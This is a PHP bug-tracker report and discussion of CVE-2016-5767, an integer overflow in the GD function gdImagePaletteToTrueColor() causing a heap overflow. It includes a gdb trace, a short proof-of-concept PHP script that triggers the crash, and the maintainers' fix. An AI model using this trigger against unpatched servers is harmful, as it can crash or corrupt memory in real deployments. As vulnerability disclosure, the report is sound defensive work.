PHP :: Sec Bug #72446 :: Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow

Sec Bug #72446	Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
Submitted:	2016-06-18 15:55 UTC	Modified:	2016-06-23 12:33 UTC
From:	gogil at stealien dot com	Assigned:	pajoye (profile)
Status:	Closed	Package:	GD related
PHP Version:	5.5.36	OS:	Ubuntu i386
Private report:	No	CVE-ID:	2016-5767

View Developer Edit

[2016-06-18 15:55 UTC] gogil at stealien dot com

Description:
------------
The gdImagePaletteToTrueColor() is prone to an integer overflow, which result in heap based overflow.

Tested on 32-bits.


/php$ gdb --args php-5.6.22/sapi/cli/php poc.php
Reading symbols from php-5.6.22/sapi/cli/php...done.
(gdb) b libgd/gd.c:3035
Breakpoint 1 at 0x823a806: file /php/php-5.6.22/ext/gd/libgd/gd.c, line 3035.
(gdb) r
Starting program: /php/php-5.6.22/sapi/cli/php poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, gdImagePaletteToTrueColor (src=0xb4f96d34)
    at /php/php-5.6.22/ext/gd/libgd/gd.c:3035
3035		const unsigned int sx = gdImageSX(src);
(gdb) n
3037		src->tpixels = (int **) gdMalloc(sizeof(int *) * sy);
(gdb) p/x sx
$1 = 0x40000000    <---------- 'sx' is 0x40000000.

(gdb) n
...
3047		src->tpixels[y] = (int *) gdMalloc(sx * sizeof(int));  <---------- sizeof(int) is 0x4.
<---------- gdMalloc will allocate memory with size 0. (LP32/LP64 only)

...
3052		dst_row = src->tpixels[y];
(gdb) n
3053		for (x = 0; x < sx; x++) {
...
3058				*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);
(gdb) x/x dst_row+x
0xb4f96160:	0x2d9c25e0
(gdb) n
3053		for (x = 0; x < sx; x++) {
(gdb) x/x dst_row+x
0xb4f96160:	0x61616161    <---------- It cause heap overflow


(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0823a974 in gdImagePaletteToTrueColor (src=0xb4f96d34)
    at /php/php-5.6.22/ext/gd/libgd/gd.c:3058
3058				*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);




* Fix
File libgd/gd.c, line 123:
gdImagePtr gdImageCreate (int sx, int sy)
{
	int i;
	gdImagePtr im;

	if (overflow2(sx, sy)) {
		return NULL;
	}

	if (overflow2(sizeof(unsigned char *), sy)) {
		return NULL;
	}

+	if (overflow2(sizeof(int), sx)) {
+		return NULL;
+	}

	im = (gdImage *) gdCalloc(1, sizeof(gdImage));



Test script:
---------------
<?php
// poc.php
ini_set('memory_limit', -1);
$im = imagecreate(0x40000000, 1);
imagecolorallocatealpha($im, 0x61, 0x61, 0x61, 0x61);

imagepalettetotruecolor($im);
?>

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-06-19 03:54 UTC] stas@php.net

Looks like the issue is in libgd which means it should be reported to libgd maintainers.

[2016-06-19 04:21 UTC] gogil at stealien dot com

libgd(2.0.34RC~lasted) is not affected by this vulnerability.
php's gdImageCreate() function used a slightly different routine.

[2016-06-19 05:02 UTC] stas@php.net

-Assigned To: +Assigned To: pajoye

[2016-06-19 05:02 UTC] stas@php.net

Pierre, could you take a look? Looks like merge is missing or something?

[2016-06-19 07:43 UTC] pajoye@php.net

It should be:


	if (overflow2(sizeof (unsigned char *), sy)) {
		return NULL;
	}
	if (overflow2(sizeof (unsigned char *), sx)) {
		return NULL;
	}

palette image uses an 2D array of unsigned chars.

Gogil, Stas, thanks for all the reviews and fixes :) 

@Gogil btw, be sure to check in https://github.com/libgd/libgd as it seems you are looking to an old repo with 2.0.34 (bitbucket?) as latest version.

[2016-06-19 10:07 UTC] gogil at stealien dot com

libgd(2.0.34RC~latest) is not affected by this vulnerability.

I am sorry for my typo mistake.

[2016-06-19 14:52 UTC] pajoye@php.net

I got that thanks:)

What I mean is the latest release is 2.2.1 and 2.2.2 should come this week. :)

[2016-06-19 15:52 UTC] gogil at stealien dot com

I got it.

thanks :)

[2016-06-21 06:59 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow

[2016-06-21 06:59 UTC] stas@php.net

-Status: Assigned +Status: Closed

[2016-06-21 07:03 UTC] stas@php.net

-PHP Version: Irrelevant +PHP Version: 5.5.36

[2016-06-21 07:03 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow

[2016-06-21 07:26 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow

[2016-06-21 07:27 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow

[2016-06-22 05:57 UTC] krakjoe@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow

[2016-06-23 12:33 UTC] kaplan@php.net

-CVE-ID: +CVE-ID: 2016-5767

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Nov 21 09:01:32 2024 UTC